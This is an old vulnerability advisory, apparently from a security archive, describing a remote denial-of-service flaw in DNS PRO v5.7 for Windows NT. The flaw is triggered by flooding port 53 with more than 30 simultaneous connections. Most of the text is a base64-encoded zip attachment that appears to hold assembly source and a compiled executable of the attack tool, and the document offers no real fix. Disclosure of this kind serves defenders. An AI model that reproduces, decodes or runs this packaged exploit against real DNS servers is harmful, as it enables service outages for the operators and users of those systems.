COMMAND
DNS Pro
SYSTEMS AFFECTED
DNS PRO v5.7 WinNT From FBLI
PROBLEM
UssrLabs found a Remote DoS Attack in DNS PRO v5.7 WinNT, The
D.o.S is caused by a Multiples connections at the same time (over
30) in the Dns Port (53), and some characters to the port. If
DNS PRO v5.7 is running as service, Take all computer resources
CPU 100%. There is not much to expand on.... just a simple hole.
Binary or source for this problem:
http://www.ussrback.com/
Below is mimed source:
---
Content-Type: application/octet-stream; name="ddnspro.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="ddnspro.zip"
Content-MD5: l97RzHoWWTINfi8ZBOPgNw==
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
AAAA
-----
SOLUTION
That will be fixed soon.